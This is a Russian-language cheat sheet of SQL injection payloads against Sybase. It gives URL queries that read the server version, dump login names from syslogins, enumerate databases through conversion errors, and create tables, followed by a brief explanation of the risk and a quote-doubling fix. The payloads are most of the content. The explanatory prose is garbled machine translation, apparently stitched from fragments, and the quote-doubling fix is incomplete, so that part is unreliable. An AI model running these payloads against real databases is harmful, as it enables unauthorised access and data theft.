Обрезать запрос можно использовав комментарий: -- или /*

Узнаём версию Sybase:
http://site.com/index.php?search=-1+union+select+@@version()--

Для того, чтобы получить целое через ошибку рассмотренную выше, мы просто преобразовываем целое в строку:
convert(integer,(select 'z' + str(@@version_as_integer)))

Выводим имена всех пользователей:
http://site.com/index.php?search=-1+union+select+name+from+syslogins--

Cписок баз данных на сервере:
http://site.com/index.php?search=')+and+1=convert(integer,(select+ min(name)+from+sysdatabases+where+name>''))--

Используем запрос Transact-SQL's, группирующий характеристику:
http://site.com/index.php?search=')+create+table+foo(a+integer)--
серьезная проблема безопасности, для неё характерны несколько причин:
1. Хакер может послать запрос, включая Обработку Данных Языковых утверждений (DML) и Определения Данных Языковых утверждений (DDL).
2. Хакер использует pre-authenticated подлинный канал, который предусмотрен приложением. В примере выше, приложение удостоверяет как "sa" , так что хакер может легко управлять сервером, выполняющим Sybase but нормально счет должен быть более низким-привилегированным счетом пользователя.
search = search.replaceAll( "'", "''");
после вызова на getParameter, единственные кавычки "удваиваются". Конечно, это не будет работать для числовых данных поскольку числа не ограничены в выполнении SQL. Если наш поиск был для pub_id, хакер мог бы просто послать SQL запрос непосредственно после числа, не требуя единственные кавычки.